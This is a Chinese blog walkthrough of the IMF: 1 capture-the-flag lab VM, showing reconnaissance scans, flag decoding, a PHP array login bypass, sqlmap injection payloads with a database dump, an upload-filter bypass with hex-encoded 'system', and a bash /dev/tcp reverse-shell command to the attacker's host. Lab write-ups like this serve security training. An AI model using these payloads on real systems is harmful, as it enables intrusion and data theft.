红队打靶练习:IMF: 1

2024-02-17 20:44
文章标签 练习 红队 打靶 imf

本文主要是介绍红队打靶练习:IMF: 1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

信息收集

1、arp

2、nmap

3、nikto

目录探测

gobuster

dirsearch

WEB

信息收集

get flag1

get flag2

get flag3

SQL注入

漏洞探测

脱库

get flag4

文件上传

反弹shell

提权

get flag5

get flag6

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.61.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.61.1    00:50:56:c0:00:08       VMware, Inc.
192.168.61.2    00:50:56:f0:df:20       VMware, Inc.
192.168.61.131  00:50:56:3c:c7:9b       VMware, Inc.
192.168.61.254  00:50:56:ed:67:13       VMware, Inc.5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.089 seconds (122.55 hosts/sec). 4 responded

2、nmap
端口扫描┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.61.131 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-16 16:31 CST
Nmap scan report for 192.168.61.131
Host is up (0.00056s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:50:56:3C:C7:9B (VMware)Nmap done: 1 IP address (1 host up) scanned in 14.16 seconds

版本信息探测──(root㉿ru)-[~/kali]
└─# nmap -sCV -O -A -p 80 192.168.61.131 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-16 16:38 CST
Nmap scan report for 192.168.61.131
Host is up (0.00051s latency).PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: IMF - Homepage
MAC Address: 00:50:56:3C:C7:9B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (93%), Linux 3.16 - 4.6 (93%), Linux 3.2 - 4.9 (93%), Linux 4.4 (93%), Linux 3.13 (90%), Linux 3.18 (89%), Linux 4.2 (87%), Linux 3.13 - 3.16 (87%), Linux 3.16 (87%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hopTRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.61.131OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.32 seconds

3、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h http://192.168.61.131
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.61.131
+ Target Hostname:    192.168.61.131
+ Target Port:        80
+ Start Time:         2024-02-16 16:44:13 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-02-16 16:44:36 (GMT8) (23 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

目录探测

gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.61.131 -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.61.131
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/images               (Status: 301) [Size: 317] [--> http://192.168.61.131/images/]
/index.php            (Status: 200) [Size: 4797]
/contact.php          (Status: 200) [Size: 8649]
/projects.php         (Status: 200) [Size: 6574]
/css                  (Status: 301) [Size: 314] [--> http://192.168.61.131/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.61.131/js/]
/fonts                (Status: 301) [Size: 316] [--> http://192.168.61.131/fonts/]
/less                 (Status: 301) [Size: 315] [--> http://192.168.61.131/less/]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 882248 / 882252 (100.00%)
===============================================================
Finished
===============================================================

dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.61.131 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594Output File: /root/kali/reports/http_192.168.61.131/_24-02-16_16-46-31.txtTarget: http://192.168.61.131/[16:46:31] Starting:
[16:46:31] 301 -  313B  - /js  ->  http://192.168.61.131/js/
[16:46:56] 200 -    2KB - /contact.php
[16:46:57] 301 -  314B  - /css  ->  http://192.168.61.131/css/
[16:47:02] 301 -  316B  - /fonts  ->  http://192.168.61.131/fonts/
[16:47:05] 301 -  317B  - /images  ->  http://192.168.61.131/images/
[16:47:20] 200 -    2KB - /projects.phpTask Completed

WEB

信息收集



发现联系人,这个用户名可能有用!收集起来!!

get flag1


在联系人的源码里面发现flag1flag1{YWxsdGhlZmlsZXM=}


解码得到这个,看起来像一个目录!!


发现并不存在!看来线索是目录!!我们去源码里面收集一下目录!


这些看着太可疑了!我们解码一下!<script src="js/ZmxhZzJ7YVcxbVl.js"></script><script src="js/XUnRhVzVwYzNS.js"></script><script src="js/eVlYUnZjZz09fQ==.min.js"></script>

get flag2
   ┌──(root㉿ru)-[~/kali]
└─# echo "ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==" | base64 -d
flag2{aW1mYWRtaW5pc3RyYXRvcg==}

好家伙,把base64编码目录放在一起解码。居然是flag2!!flag2解码:imfadministrator



尝试访问后,是个目录!!


译:我无法使SQL正常工作,所以我硬编码了密码。它仍然非常安全。-罗杰

get flag3


尝试了很多次!使用工具进行爆破依然不行!用户名只有rmichaels可以用!!看到源码的翻译,我突然想到了php的数组绕过!




成功了!多打ctf!!flag3{Y29udGludWVUT2Ntcw==}解码:continueTOcms


SQL注入

漏洞探测



感觉存在注入!!

┌──(root㉿ru)-[~/kali]
└─# sqlmap -u "http://192.168.61.131/imfadministrator/cms.php?pagename=upload" --threads 10 --cookie "PHPSESSID=j94gf81l5gacd60uq27hoqc2i6"_____H_____ ___[.]_____ ___ ___  {1.7.12#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 17:39:46 /2024-02-16/[17:39:46] [INFO] resuming back-end DBMS 'mysql'
[17:39:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pagename (GET)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: pagename=home' AND 5929=5929 AND 'OPxd'='OPxdType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: pagename=home' AND (SELECT 5670 FROM(SELECT COUNT(*),CONCAT(0x71767a6271,(SELECT (ELT(5670=5670,1))),0x7176787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'oEWi'='oEWiType: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: pagename=home' AND (SELECT 2619 FROM (SELECT(SLEEP(5)))tVFy) AND 'xkdf'='xkdfType: UNION queryTitle: MySQL UNION query (NULL) - 1 columnPayload: pagename=-8077' UNION ALL SELECT CONCAT(0x71767a6271,0x69694d646149717059546245524f736753694f64697452745263486c6f68684962645068496c4c41,0x7176787a71)#
---
[17:39:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 16.04 or 16.10 (yakkety or xenial)
web application technology: Apache 2.4.18
back-end DBMS: MySQL >= 5.0
[17:39:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.61.131'[*] ending @ 17:39:46 /2024-02-16/

脱库
payloadsqlmap -u "http://192.168.61.131/imfadministrator/cms.php?pagename=upload" --threads 10 --cookie "PHPSESSID=j94gf81l5gacd60uq27hoqc2i6" --dbs -D admin -T pages -C pagedata,pagename --dump


得到目录  tutorials-incomplete  ??   尝试访问!!

get flag4



得到flag4{dXBsb2Fkcjk0Mi5waHA=}解码:uploadr942.php


文件上传


访问后是一个上传点!!


使用带有php后缀的会报错!文件太大也会报错!存在waf??我们干脆写个phpinfo得了!


响应码为200!并且返回一串字符!!1717afa8d2db

┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.61.131/imfadministrator/ -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.61.131/imfadministrator/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 200) [Size: 337]
/images               (Status: 301) [Size: 334] [--> http://192.168.61.131/imfadministrator/images/]
/uploads              (Status: 301) [Size: 335] [--> http://192.168.61.131/imfadministrator/uploads/]
/cms.php              (Status: 200) [Size: 134]

uploads  !!


经过尝试,这个waf的拦截规则很有趣!首先图片类型的话只能上传gif,目前只有gif可以使用!而且图片不能过大,太大的话,waf会拦截!!
图片所包含的php函数必须是waf没有拦截的才行!

这些都是PHP.ini 配置文件中所添加的,不允许我们使用!!既然这样,我们可以构造system函数!不过我们需要将system函数进行十六进制转换!!system  ---  \x73\x79\x73\x74\x65\x6d


上传成功! 这样我们就可以进行命令执行了!!!


反弹shell

payload/bin/bash -c 'bash -i >%26/dev/tcp/192.168.61.128/1234 0>%261'


提权

get flag5
┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.61.131: inverse host lookup failed: Unknown host
connect to [192.168.61.128] from (UNKNOWN) [192.168.61.131] 56656
bash: cannot set terminal process group (1257): Inappropriate ioctl for device
bash: no job control in this shell
www-data@imf:/var/www/html/imfadministrator/uploads$ ls
ls
096eb934e639.png
12f62e48bf27.gif
1717afa8d2db.gif
1e2e31a630df.png
26073d903c06.gif
flag5_abc123def.txt
www-data@imf:/var/www/html/imfadministrator/uploads$ cat flag5_abc123def.txt
cat flag5_abc123def.txt
flag5{YWdlbnRzZXJ2aWNlcw==}

flag5{YWdlbnRzZXJ2aWNlcw==}解码:agentservices


get flag6
涉及到溢出漏洞!目前还不会!学会了再来补!!!

这篇关于红队打靶练习:IMF: 1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/718944

相关文章

RabbitMQ练习(AMQP 0-9-1 Overview)

1、What is AMQP 0-9-1 AMQP 0-9-1(高级消息队列协议)是一种网络协议,它允许遵从该协议的客户端(Publisher或者Consumer)应用程序与遵从该协议的消息中间件代理(Broker,如RabbitMQ)进行通信。 AMQP 0-9-1模型的核心概念包括消息发布者(producers/publisher)、消息(messages)、交换机(exchanges)、

【Rust练习】12.枚举

练习题来自:https://practice-zh.course.rs/compound-types/enum.html 1 // 修复错误enum Number {Zero,One,Two,}enum Number1 {Zero = 0,One,Two,}// C语言风格的枚举定义enum Number2 {Zero = 0.0,One = 1.0,Two = 2.0,}fn m

MySql 事务练习

事务(transaction) -- 事务 transaction-- 事务是一组操作的集合,是一个不可分割的工作单位,事务会将所有的操作作为一个整体一起向系统提交或撤销请求-- 事务的操作要么同时成功,要么同时失败-- MySql的事务默认是自动提交的,当执行一个DML语句,MySql会立即自动隐式提交事务-- 常见案例:银行转账-- 逻辑:A给B转账1000:1.查询

html css jquery选项卡 代码练习小项目

在学习 html 和 css jquery 结合使用的时候 做好是能尝试做一些简单的小功能,来提高自己的 逻辑能力,熟悉代码的编写语法 下面分享一段代码 使用html css jquery选项卡 代码练习 <div class="box"><dl class="tab"><dd class="active">手机</dd><dd>家电</dd><dd>服装</dd><dd>数码</dd><dd

014.Python爬虫系列_解析练习

我 的 个 人 主 页:👉👉 失心疯的个人主页 👈👈 入 门 教 程 推 荐 :👉👉 Python零基础入门教程合集 👈👈 虚 拟 环 境 搭 建 :👉👉 Python项目虚拟环境(超详细讲解) 👈👈 PyQt5 系 列 教 程:👉👉 Python GUI(PyQt5)文章合集 👈👈 Oracle数据库教程:👉👉 Oracle数据库文章合集 👈👈 优

如何快速练习键盘盲打

盲打是指在不看键盘的情况下进行打字,这样可以显著提高打字速度和效率。以下是一些练习盲打的方法: 熟悉键盘布局:首先,你需要熟悉键盘上的字母和符号的位置。可以通过键盘图或者键盘贴纸来帮助记忆。 使用在线打字练习工具:有许多在线的打字练习网站,如Typing.com、10FastFingers等,它们提供了不同难度的练习和测试。 练习基本键位:先从学习手指放在键盘上的“家位”开始,通常是左手的

anaconda3下的python编程练习-csv翻译器

相关理解和命令 一、环境配置1、conda命令2、pip命令3、python命令 二、开发思路三、开发步骤 一、环境配置 1、conda命令 镜像源配置 conda config --show channels //查看镜像源conda config --remove-key channels //删除添加源,恢复默认源#添加镜像源conda config --ad

推荐练习键盘盲打的网站

对于初学者来说,以下是一些推荐的在线打字练习网站: 打字侠:这是一个专业的在线打字练习平台,提供科学合理的课程设置和个性化学习计划,适合各个水平的用户。它还提供实时反馈和数据分析,帮助你提升打字速度和准确度。 dazidazi.com:这个网站提供了基础的打字练习,适合初学者从零开始学习打字。 Type.fun打字星球:提供了丰富的盲打课程和科学的打字课程设计,还有诗词歌赋、经典名著等多样

综合DHCP、ACL、NAT、Telnet和PPPoE进行网络设计练习

描述:企业内网和运营商网络如上图所示。 公网IP段:12.1.1.0/24。 内网IP段:192.168.1.0/24。 公网口PPPOE 拨号采用CHAP认证,用户名:admin 密码:Admin@123 财务PC 配置静态IP:192.168.1.8 R1使用模拟器中的AR201型号,作为交换路由一体机,下图的WAN口为E0/0/8口,可以在该接口下配置IP地址。 可以通过

JAVA学习-练习试用Java实现“删除有序数组中的重复项”

问题: 给你一个有序数组 nums ,请你 原地 删除重复出现的元素,使每个元素 只出现一次 ,返回删除后数组的新长度。 不要使用额外的数组空间,你必须在 原地 修改输入数组 并在使用 O(1) 额外空间的条件下完成。 说明: 为什么返回数值是整数,但输出的答案是数组呢? 请注意,输入数组是以「引用」方式传递的,这意味着在函数里修改输入数组对于调用者是可见的。 你可以想象内部操作如下